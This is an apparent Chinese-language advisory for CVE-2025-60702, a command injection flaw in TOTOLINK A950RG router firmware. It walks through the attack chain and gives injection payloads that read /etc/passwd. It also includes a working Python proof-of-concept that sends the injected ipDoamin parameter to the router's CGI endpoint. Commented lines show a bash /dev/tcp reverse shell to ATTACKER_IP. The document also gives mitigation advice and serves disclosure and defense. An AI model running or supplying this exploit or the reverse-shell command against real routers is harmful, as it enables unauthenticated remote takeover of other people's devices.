CVE-2025-60702 TOTOLINK A950RG路由器命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-60702

漏洞类型

命令注入

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

TOTOLINK A950RG路由器

漏洞概述

CVE-2025-60702是TOTOLINK A950RG路由器固件V5.9c.4592_B20191022_ALL中存在的一个命令注入漏洞。该漏洞位于system.so二进制文件的setDiagnosisCfg函数中，攻击者可以通过发送精心构造的HTTP请求来触发该漏洞。由于setDiagnosisCfg函数在获取用户输入的ipDoamin参数后，直接将该参数拼接到ping系统命令中执行，而未进行任何安全过滤或验证，攻击者可以在参数中注入任意系统命令。这意味着未经身份验证的远程攻击者可以完全控制路由器设备，执行任意系统命令，可能导致设备完全沦陷、敏感信息泄露或将其纳入僵尸网络等严重后果。

技术细节

该漏洞的根本原因在于TOTOLINK A950RG路由器固件中的输入验证不足。在system.so二进制文件的setDiagnosisCfg函数中，程序通过websGetVar函数获取用户输入的ipDoamin参数，该参数本应用于网络诊断功能中的域名或IP地址解析。然而，开发人员直接将此参数与ping命令进行字符串拼接，然后通过CsteSystem()函数执行。由于缺少对特殊字符（如分号、管道符、反引号等）的过滤和转义，攻击者可以在ipDoamin参数中注入额外的系统命令。攻击者只需构造形如';whoami;'或'|cat /etc/passwd'的payload即可在目标路由器上执行任意命令。该漏洞存在于路由器的Web管理界面，由于该接口通常可直接从WAN口访问，因此构成了严重的安全风险。

攻击链分析

STEP 1

步骤1

攻击者识别目标路由器TOTOLINK A950RG的IP地址和Web管理端口

STEP 2

步骤2

攻击者构造包含恶意命令的HTTP POST请求，目标URL为/cgi-bin/cstecgi.cgi

STEP 3

步骤3

在请求参数中设置topicurl为'setDiagnosisCfg'，ipDoamin参数包含命令注入payload

STEP 4

步骤4

路由器Web服务接收请求，调用system.so中的setDiagnosisCfg函数处理

STEP 5

步骤5

setDiagnosisCfg函数通过websGetVar获取ipDoamin参数值，未进行任何过滤

STEP 6

步骤6

恶意参数值被直接拼接到ping命令字符串中，形成完整的系统命令

STEP 7

步骤7

通过CsteSystem()函数执行构造的命令，攻击者注入的命令以root权限运行

STEP 8

步骤8

攻击者获取设备完全控制权，可执行任意系统操作、窃取数据或部署恶意软件

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-60702 PoC - TOTOLINK A950RG Command Injection
# Target: TOTOLINK A950RG Router Firmware V5.9c.4592_B20191022_ALL
# Vulnerability: Command Injection in setDiagnosisCfg function via ipDoamin parameter

target_ip = "192.168.0.1"  # Router IP address
target_port = 80

def exploit_command_injection(target, command):
    """
    Execute arbitrary command on vulnerable TOTOLINK A950RG router
    """
    # Construct the malicious ipDoamin parameter with command injection
    # Using semicolon to chain commands
    payload = ";" + command
    
    url = f"http://{target}/cgi-bin/cstecgi.cgi"
    
    # The vulnerable endpoint and parameter
    data = {
        "topicurl": "setDiagnosisCfg",
        "ipDoamin": payload
    }
    
    try:
        response = requests.post(url, data=data, timeout=5)
        print(f"[*] Sent payload: {payload}")
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response: {response.text}")
        return response
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None

# Example: List directory contents
exploit_command_injection(target_ip, "ls -la /")

# Example: Read /etc/passwd
# exploit_command_injection(target_ip, "cat /etc/passwd")

# Example: Start a reverse shell
# payload = ";bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1"
# exploit_command_injection(target_ip, "bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1")

影响范围

TOTOLINK A950RG固件 V5.9c.4592_B20191022_ALL

防御指南

临时缓解措施

建议用户尽快更新路由器固件至最新版本。如果暂时无法更新，应在防火墙层面阻断对路由器Web管理接口（默认80/443端口）的WAN访问，仅允许通过LAN侧或VPN进行管理访问。同时建议更改路由器默认管理密码，并监控异常登录行为。